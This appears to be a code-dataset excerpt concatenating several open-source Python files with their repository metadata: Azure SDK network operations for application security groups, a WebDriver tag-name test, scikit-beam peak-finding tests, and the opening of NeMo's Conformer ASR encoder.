|
397ba46c51d001ff89c66b170f5576cf8f49c05f
|
[
"MIT"
] | null | null | null |
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_application_security_groups_operations.py
|
vbarbaresi/azure-sdk-for-python
|
397ba46c51d001ff89c66b170f5576cf8f49c05f
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ApplicationSecurityGroupsOperations(object):
"""ApplicationSecurityGroupsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified application security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
application_security_group_name=application_security_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.ApplicationSecurityGroup"
"""Gets information about the specified application security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplicationSecurityGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
parameters, # type: "models.ApplicationSecurityGroup"
**kwargs # type: Any
):
# type: (...) -> "models.ApplicationSecurityGroup"
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ApplicationSecurityGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
parameters, # type: "models.ApplicationSecurityGroup"
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.ApplicationSecurityGroup"]
"""Creates or updates an application security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:param parameters: Parameters supplied to the create or update ApplicationSecurityGroup
operation.
:type parameters: ~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ApplicationSecurityGroup or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroup]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
application_security_group_name=application_security_group_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def update_tags(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "models.ApplicationSecurityGroup"
"""Updates an application security group's tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:param parameters: Parameters supplied to update application security group tags.
:type parameters: ~azure.mgmt.network.v2019_09_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplicationSecurityGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.ApplicationSecurityGroupListResult"]
"""Gets all application security groups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ApplicationSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ApplicationSecurityGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationSecurityGroups'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.ApplicationSecurityGroupListResult"]
"""Gets all the application security groups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ApplicationSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ApplicationSecurityGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups'} # type: ignore
| 49.828413
| 219
| 0.671641
|
cfc63bd788de2e38d7c092aeaea61a78411f1b65
| 1,538
|
py
|
Python
|
webdriver/tests/get_element_tag_name/get.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
webdriver/tests/get_element_tag_name/get.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 7,642
|
2018-05-28T09:38:03.000Z
|
2022-03-31T20:55:48.000Z
|
webdriver/tests/get_element_tag_name/get.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
from tests.support.asserts import assert_error, assert_success
def get_element_tag_name(session, element_id):
return session.transport.send(
"GET", "session/{session_id}/element/{element_id}/name".format(
session_id=session.session_id,
element_id=element_id))
def test_no_top_browsing_context(session, closed_window):
original_handle, element = closed_window
response = get_element_tag_name(session, element.id)
assert_error(response, "no such window")
response = get_element_tag_name(session, "foo")
assert_error(response, "no such window")
session.window_handle = original_handle
response = get_element_tag_name(session, element.id)
assert_error(response, "no such element")
def test_no_browsing_context(session, closed_frame):
response = get_element_tag_name(session, "foo")
assert_error(response, "no such window")
def test_element_not_found(session):
result = get_element_tag_name(session, "foo")
assert_error(result, "no such element")
def test_element_stale(session, inline):
session.url = inline("<input id=foo>")
element = session.find.css("input", all=False)
session.refresh()
result = get_element_tag_name(session, element.id)
assert_error(result, "stale element reference")
def test_get_element_tag_name(session, inline):
session.url = inline("<input id=foo>")
element = session.find.css("input", all=False)
result = get_element_tag_name(session, element.id)
assert_success(result, "input")
| 32.041667
| 71
| 0.735371
|
a40ff9efe418cce820c11d5dc24f49f4889c8ed2
| 5,413
|
py
|
Python
|
skbeam/core/tests/test_feature.py
|
licode/scikit-beam
|
8100cc9525a5be4ab1e48f6a6b2b7d33302db27e
|
[
"BSD-3-Clause"
] | 1
|
2018-10-12T02:01:02.000Z
|
2018-10-12T02:01:02.000Z
|
skbeam/core/tests/test_feature.py
|
licode/scikit-beam
|
8100cc9525a5be4ab1e48f6a6b2b7d33302db27e
|
[
"BSD-3-Clause"
] | null | null | null |
skbeam/core/tests/test_feature.py
|
licode/scikit-beam
|
8100cc9525a5be4ab1e48f6a6b2b7d33302db27e
|
[
"BSD-3-Clause"
] | null | null | null |
# ######################################################################
# Copyright (c) 2014, Brookhaven Science Associates, Brookhaven #
# National Laboratory. All rights reserved. #
# #
# @author: Li Li (lili@bnl.gov) #
# created on 08/19/2014 #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of the Brookhaven Science Associates, Brookhaven #
# National Laboratory nor the names of its contributors may be used #
# to endorse or promote products derived from this software without #
# specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, #
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING #
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
########################################################################
from __future__ import absolute_import, division, print_function
import numpy as np
from numpy.testing import assert_array_almost_equal
from nose.tools import assert_raises
from .utils import gauss_gen, parabola_gen
import skbeam.core.feature as feature
def _test_refine_helper(x_data, y_data, center, height,
refine_method, refine_args):
"""
helper function for testing
"""
test_center, test_height = refine_method(x_data, y_data, **refine_args)
assert_array_almost_equal(np.array([test_center, test_height]),
np.array([center, height]))
def test_refine_methods():
refine_methods = [feature.refine_quadratic,
feature.refine_log_quadratic]
test_data_gens = [parabola_gen, gauss_gen]
x = np.arange(128)
for center in (15, 75, 110):
for height in (5, 10, 100):
for rf, dm in zip(refine_methods, test_data_gens):
yield (_test_refine_helper,
x, dm(x, center, height, 5), center, height, rf, {})
def test_filter_n_largest():
cands = np.array((10, 25, 50, 75, 100))
x = np.arange(128, dtype=float)
y = np.zeros_like(x)
for c, h in zip(cands,
(10, 15, 25, 30, 35)):
y += gauss_gen(x, c, h, 3)
for j in range(1, len(cands) + 2):
out = feature.filter_n_largest(y, cands, j)
assert(len(out) == np.min([len(cands), j]))
assert_raises(ValueError, feature.filter_n_largest, y, cands, 0)
assert_raises(ValueError, feature.filter_n_largest, y, cands, -1)
def test_filter_peak_height():
cands = np.array((10, 25, 50, 75, 100))
heights = (10, 20, 30, 40, 50)
x = np.arange(128, dtype=float)
y = np.zeros_like(x)
for c, h in zip(cands,
heights):
y += gauss_gen(x, c, h, 3)
for j, h in enumerate(heights):
out = feature.filter_peak_height(y, cands, h - 5, window=5)
assert(len(out) == len(heights) - j)
out = feature.filter_peak_height(y, cands, h + 5, window=5)
assert(len(out) == len(heights) - j - 1)
def test_peak_refinement():
cands = np.array((10, 25, 50, 75, 100))
heights = (10, 20, 30, 40, 50)
x = np.arange(128, dtype=float)
y = np.zeros_like(x)
for c, h in zip(cands, heights):
y += gauss_gen(x, c+.5, h, 3)
loc, ht = feature.peak_refinement(x, y, cands, 5,
feature.refine_log_quadratic)
assert_array_almost_equal(loc, cands + .5, decimal=3)
assert_array_almost_equal(ht, heights, decimal=3)
if __name__ == '__main__':
import nose
nose.runmodule(argv=['-s', '--with-doctest'], exit=False)
| 45.487395
| 75
| 0.55145
|
6f0d3698deb7ee9a157cd4e7181c16f80f38ff6b
| 9,888
|
py
|
Python
|
nemo/collections/asr/modules/conformer_encoder.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | 1
|
2021-06-19T19:27:19.000Z
|
2021-06-19T19:27:19.000Z
|
nemo/collections/asr/modules/conformer_encoder.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | null | null | null |
nemo/collections/asr/modules/conformer_encoder.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from collections import OrderedDict
import torch
import torch.nn as nn
from nemo.collections.asr.parts.conformer_modules import ConformerLayer
from nemo.collections.asr.parts.multi_head_attention import PositionalEncoding, RelPositionalEncoding
from nemo.collections.asr.parts.subsampling import ConvSubsampling
from nemo.core.classes.common import typecheck
from nemo.core.classes.exportable import Exportable
from nemo.core.classes.module import NeuralModule
from nemo.core.neural_types import AcousticEncodedRepresentation, LengthsType, NeuralType, SpectrogramType
__all__ = ['ConformerEncoder']
class ConformerEncoder(NeuralModule, Exportable):
"""
The encoder for ASR model of Conformer.
Based on this paper:
'Conformer: Convolution-augmented Transformer for Speech Recognition' by Anmol Gulati et al.
https://arxiv.org/abs/2005.08100
Args:
feat_in (int): the size of feature channels
n_layers (int): number of layers of ConformerBlock
d_model (int): the hidden size of the model
feat_out (int): the size of the output features
Defaults to -1 (means feat_out is d_model)
subsampling (str): the method of subsampling, choices=['vggnet', 'striding']
Defaults to striding.
subsampling_factor (int): the subsampling factor which should be power of 2
Defaults to 4.
subsampling_conv_channels (int): the size of the convolutions in the subsampling module
Defaults to -1 which would set it to d_model.
ff_expansion_factor (int): the expansion factor in feed forward layers
Defaults to 4.
self_attention_model (str): type of the attention layer and positional encoding
'rel_pos': relative positional embedding and Transformer-XL
'abs_pos': absolute positional embedding and Transformer
default is rel_pos.
pos_emb_max_len (int): the maximum length of positional embeddings
Defaulst to 5000
n_heads (int): number of heads in multi-headed attention layers
Defaults to 4.
xscaling (bool): enables scaling the inputs to the multi-headed attention layers by sqrt(d_model)
Defaults to True.
untie_biases (bool): whether to not share (untie) the bias weights between layers of Transformer-XL
Defaults to True.
conv_kernel_size (int): the size of the convolutions in the convolutional modules
Defaults to 31.
dropout (float): the dropout rate used in all layers except the attention layers
Defaults to 0.1.
dropout_emb (float): the dropout rate used for the positional embeddings
Defaults to 0.1.
dropout_att (float): the dropout rate used for the attention layer
Defaults to 0.0.
"""
def input_example(self):
"""
Generates input examples for tracing etc.
Returns:
A tuple of input examples.
"""
input_example = torch.randn(16, self._feat_in, 256).to(next(self.parameters()).device)
input_example_length = torch.randint(0, 256, (16,)).to(next(self.parameters()).device)
return tuple([input_example, input_example_length])
@property
def input_types(self):
"""Returns definitions of module input ports.
"""
return OrderedDict(
{
"audio_signal": NeuralType(('B', 'D', 'T'), SpectrogramType()),
"length": NeuralType(tuple('B'), LengthsType()),
}
)
@property
def output_types(self):
"""Returns definitions of module output ports.
"""
return OrderedDict(
{
"outputs": NeuralType(('B', 'D', 'T'), AcousticEncodedRepresentation()),
"encoded_lengths": NeuralType(tuple('B'), LengthsType()),
}
)
def __init__(
self,
feat_in,
n_layers,
d_model,
feat_out=-1,
subsampling='striding',
subsampling_factor=4,
subsampling_conv_channels=-1,
ff_expansion_factor=4,
self_attention_model='rel_pos',
n_heads=4,
att_context_size=None,
xscaling=True,
untie_biases=True,
pos_emb_max_len=5000,
conv_kernel_size=31,
dropout=0.1,
dropout_emb=0.1,
dropout_att=0.0,
):
super().__init__()
d_ff = d_model * ff_expansion_factor
self.d_model = d_model
self._feat_in = feat_in
self.scale = math.sqrt(self.d_model)
if att_context_size:
self.att_context_size = att_context_size
else:
self.att_context_size = [-1, -1]
if xscaling:
self.xscale = math.sqrt(d_model)
else:
self.xscale = None
if subsampling_conv_channels == -1:
subsampling_conv_channels = d_model
if subsampling:
self.pre_encode = ConvSubsampling(
subsampling=subsampling,
subsampling_factor=subsampling_factor,
feat_in=feat_in,
feat_out=d_model,
conv_channels=subsampling_conv_channels,
activation=nn.ReLU(),
)
self._feat_out = d_model
else:
self._feat_out = d_model
self.pre_encode = nn.Linear(feat_in, d_model)
if not untie_biases and self_attention_model == "rel_pos":
d_head = d_model // n_heads
pos_bias_u = nn.Parameter(torch.Tensor(n_heads, d_head))
pos_bias_v = nn.Parameter(torch.Tensor(n_heads, d_head))
nn.init.zeros_(pos_bias_u)
nn.init.zeros_(pos_bias_v)
else:
pos_bias_u = None
pos_bias_v = None
if self_attention_model == "rel_pos":
self.pos_enc = RelPositionalEncoding(
d_model=d_model,
